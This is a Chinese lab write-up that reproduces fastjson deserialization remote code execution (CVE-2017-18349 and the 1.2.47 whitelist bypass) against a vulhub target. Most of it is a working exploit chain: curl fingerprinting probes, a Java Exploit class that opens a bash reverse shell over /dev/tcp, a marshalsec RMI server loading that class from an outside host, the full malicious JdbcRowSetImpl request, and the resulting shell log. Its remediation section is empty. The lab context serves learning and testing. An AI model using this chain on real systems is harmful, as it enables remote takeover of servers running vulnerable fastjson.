漏洞背景

• fastjson<=1.2.24，CVE-2017-18349，前台无回显RCE
  fastjson在解析json的过程中，支持使用autoType来实例化某一个具体的类，并调用该类的set/get方法来访问属性。通过查找代码中相关的方法，即可构造出一些恶意利用链。
• fastjson<=1.2.47,前台无回显RCE
  fastjson于1.2.24版本后增加了反序列化白名单，而在1.2.48以前的版本中，攻击者可以利用特殊构造的json字符串绕过白名单检测，成功执行任意命令。

java不熟。。。跳过原理分析，了解到这里就算了OTZ

漏洞特征

1. 如果站点有原始报错回显，可以用不闭合花括号的方式进行报错回显，报错中往往会有fastjson的字样.(vulhub环境不适用）。curl http://10.154.7.128:8090/ -H "Content-Type: application/json" --data '{"name":"success", "age":20'
2. 可以通过DNS回显的方式检测后端是否使用Fastjson。curl http://10.154.7.128:8090/ -H "Content-Type: application/json" --data '{{"@type":"java.net.URL","val":"dnslog"}:0'
3. Java 系 Json 处理基本只有 Fastjson 和 Jackson，追加一个随机 key时jackson会报错。
4. 对使用fastjson的。Fastjson < 1.2.60 在取不到值的时候会填充 \u001a ,在1.2.60 进行了修复, 对 \x 后面的字符进行是否为16进制允许字符 (0-9a-fA-F) 的校验,所以这里就可以手动 padding ,构造一个特殊的字符串。

以上这串我也没看懂，后来大佬跟我说看到json的就打一下，反正不吃亏。。。。我觉得挺有道理的。

本地复现

• fastjson/1.2.24-rce
• fastjson/1.2.47-rce

# 本地攻击机，目标机10.154.7.128:28764，远程类http://167.71.218.107/Exploit.class,控制机10.154.7.128:53
root@ninomi:~# curl http://10.154.7.128:8090/ #访问8090端口即可看到JSON格式的输出
{
        "age":25,
        "name":"Bob"
root@ninomi:~# curl http://10.154.7.128:8090/ -H "Content-Type: application/json" --data '{"name":"success", "age":20}' #传入的json字段被解析
{
        "age":20,
        "name":"success"
}
#编译以下代码，放在web目录下可访问。kali里版本是javac 11.0.5会出错。在centos下yum install java-1.8.0-openjdk* -y后编译。
//javac  Exploit.java
public class Exploit {
    public Exploit(){
        try{
            Runtime.getRuntime().exec("/bin/bash -c $@|bash 0 echo bash -i >&/dev/tcp/10.154.7.128/53 0>&1");
        }catch(Exception e){
            e.printStackTrace();
        }
    }
    public static void main(String[] argv){
        Exploit e = new Exploit();
    }
}
#启动一个RMI服务器，监听9999端口，并指定加载远程类Exploit.class
#java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://167.71.218.107/#Exploit" 9999
* Opening JRMP listener on 9999

本地bp发攻击包

POST / HTTP/1.1
Host: 10.154.7.128:28764
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 166

{
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://10.154.7.128:9999/Exploit",
        "autoCommit":true
    }
}

本地listen获得反弹shell

Have connection from /10.0.6.2:36644
Reading message...
Is RMI.lookup call for Exploit 2
Sending remote classloading stub targeting http://167.71.218.107/Exploit.class
Closing connection
# 本地listen53端口拿到反弹shell

漏洞修复

参考资料

• 无损检测Fastjson DoS漏洞以及盲区分Fastjson与Jackson组件：https://blog.riskivy.com/%E6%97%A0%E6%8D%9F%E6%A3%80%E6%B5%8Bfastjson-dos%E6%BC%8F%E6%B4%9E%E4%BB%A5%E5%8F%8A%E7%9B%B2%E5%8C%BA%E5%88%86fastjson%E4%B8%8Ejackson%E7%BB%84%E4%BB%B6/
• payload:https://github.com/CaijiOrz/fastjson-1.2.47-RCE
• vulhub：
  https://vulhub.org/#/environments/fastjson/1.2.24-rce/；https://vulhub.org/#/environments/fastjson/1.2.47-rce/

总结

1. 编译时要注意openjdk版本需要是1.8
   2.远程类文件后面不能带参数（payload就是这么死，会在后面补上.class。。。）
2. 但是为什么rmi服务器这里必须加载远程类而不能加载本地类呢…………………………